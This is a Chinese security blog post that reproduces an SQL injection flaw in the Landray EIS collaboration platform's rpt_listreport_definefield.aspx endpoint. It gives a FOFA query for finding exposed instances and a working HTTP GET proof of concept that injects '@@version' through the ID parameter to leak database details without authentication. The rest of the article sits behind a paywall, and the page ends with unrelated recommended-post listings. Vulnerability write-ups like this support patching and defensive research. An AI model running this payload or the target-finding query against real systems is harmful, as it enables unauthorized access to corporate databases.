蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞复现

已于 2024-03-04 17:31:57 修改
阅读量431 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-03-04 17:31:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136457781
版权

0x01 产品简介

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。

0x02 漏洞概述

由于蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

0x03 复现环境

FOFA:app="Landray-EIS智慧协同平台"

0x04 漏洞复现

PoC

GET /SM/rpt_listreport_definefield.aspx?ID=1%20and%201=@@version-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1

查询数据库版

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
蓝凌EIS智慧协同平台-rpt-listreport-definefield-sql注入
weixin_43567873的博客
03-04 191
蓝凌EIS智慧协同平台 rpt_listreport_definefield接口存在SQL注入漏洞
蓝凌EIS4.0白皮书
12-13
蓝凌EIS4.0白皮书,知识管理专家,让工作更智慧
蓝凌-EIS-doc-fileedit-word-sql注入-漏洞
weixin_43167326的博客
01-20 377
蓝凌EIS是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌EIS能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌EIS还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌EIS还提供丰富的。
蓝凌协同管理平台功能列表.doc
09-24
蓝凌协同管理平台是一款强大的企业级管理工具,其功能涵盖了门户应用、标准应用模块等多个方面,旨在提升企业的协同效率和知识管理能力。 1. **门户应用**:蓝凌EIS V6.0提供了多种类型的门户,包括个人门户、工作...
(完整版)EKP管理员手册_流程表单配置(20210525175604).pdf
05-25
(完整版)EKP管理员手册_流程表单配置(20210525175604).pdf
蓝凌知识管理赋能全员,打造基准方中智慧设计院.pdf
05-25
蓝凌知识管理赋能全员,打造基准方中智慧设计院.pdf
蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py
08-28
自己写的批量扫描脚本,很好用,可以借鉴一下
AI安全系列——[第五空间 2022]AI(持续更新)
2201_76139143的博客
07-15 715
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1300
随着医疗信息化的发展,医疗健康数据呈出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 365
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 549
通过上述步骤和代码示例,我们展示了如何在Eureka中实服务的分布式安全策略。这包括服务认证、授权机制的实,以及数据传输加密等关键安全措施。Eureka作为服务发框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实
非法闯入智能监测摄像机:安全守护的新利器
bova2022的博客
07-15 216
首先,它能够智能分析画面中的人物和物体,通过对比数据库识别可疑目标,自动过滤正常活动,减少误报。此外,很多智能摄像机支持远程监控,用户可以随时通过手机或电脑查看实时画面,确保安全无死角。在商业环境中,摄像机可以有效防止盗窃和破坏,提升商业安全防范水平。总之,非法闯入智能监测摄像机作为代安防技术的重要组成部分,以其智能、高效的特性,正不断提升人们的安全感。随着技术的持续发展和应用场景的扩大,未来这些摄像机将在保护人们生命和财产安全方面发挥更加重要的作用,为我们的生活带来更多保障。
使用Python实深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 478
通过以上步骤,我们实了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。
移动应用安全需求分析与安全保护工程
weixin_48579910的博客
07-12 1113
移动应用安全面临许多威胁,包括数据泄露、恶意软件、应用漏洞、不安全的网络通信和数据存储等。通过实施数据保护、安全编码、网络通信安全、应用加固、权限管理、安全更新和用户教育等措施,可以有效地提高移动应用的安全性,保护用户数据和隐私。综合采用安全开发生命周期(SDL)和持续安全监控与响应策略,确保移动应用在整个生命周期内的安全性。Android系统通过一系列系统级、应用级和用户级的安全机制,提供了全面的保护。应用沙盒、权限模型、SELinux、数据加密、应用签名、代码混淆等措施,有效地防止了多种安全威胁。
富格林:曝光纠正安全交易误区
fgl100的博客
07-11 518
因此,贵金属并非完全无风险,投资者仍需注意市场风险。投资者应该理解贵金属市场的杂性,并将其视为投资组合的一部分,而不是绝对安全的避险资产。同时,通过合理的资产配置和风险管理策略,可以降低贵金属投资的风险。尽管黄金是最受欢迎的贵金属之一,但其他贵金属,如白银、铂金和钯金,同样具有投资潜力。忽视了其他贵金属的投资机会会导致投资组合的单一化,增加了风险。投资者应该考虑将不同类型的贵金属组合在其投资组合中,以实更好的风险分散和收益潜力。通过选择不同贵金属之间的相关性较低的品种,可以降低整体投资组合的风险。
智能运维提升企业长期安全防御能力
goodxianping的专栏
07-12 678
不难发,在网络安全问题中,系统漏洞已成为一个热点,CGI攻击检测、系统漏洞、数据库漏洞、不安全的远程端口开放、网络设备漏洞、本地安全检查等问题严重威胁着系统管理者和系统用户的安全。用友作为全球领先的企业数智化软件与服务提供商,不仅能够提供适合企业发展战略与业务需要的数智化系统,而且也提供了完善的信息安全保障体系,让企业客户的业务体系更安全更可控。在此背景下,为了提升企业的网络安全防护能力,确保在真实攻击发生时能够迅速响应、有效抵御并减少损失,众多企业纷纷将“攻防演练”作为提升安全防御体系的重要手段。
亚信安全发布2024年第24期《勒索家族和勒索事件监控报告》
亚信安全官方账号的博客
07-15 490
亚信安全发布2024年第24期《勒索家族和勒索事件监控报告》
Lianwei 安全周报|2024.07.15
联蔚盘云的博客
07-15 771
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
信息系统安全(第三章——访问控制)
最新发布
m0_73514785的博客
07-15 766
进程既是用户行为的客体,又是其访问对象的主体。在单处理机环境的操作系统中,根据系统设计方法的不同,TCB可以是一个安全内核,也可以是一个前端过滤器,或者就是操作系统的关键单元或包括全部操作系统。访问矩阵中的一行表示一个主体的所有权限,一列则是关于一个客体的所有访问属性,矩阵中的元素是该元素所在行对应的主体对该元素所在列对应的客体的访问权限。例如,操作系统中的文件、目录、管道、消息、信号量、进程和内存页等,数据库系统中的库、表和字段等,信息网络中的通信线路和计算节点等,都是信息系统中的常见客体。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值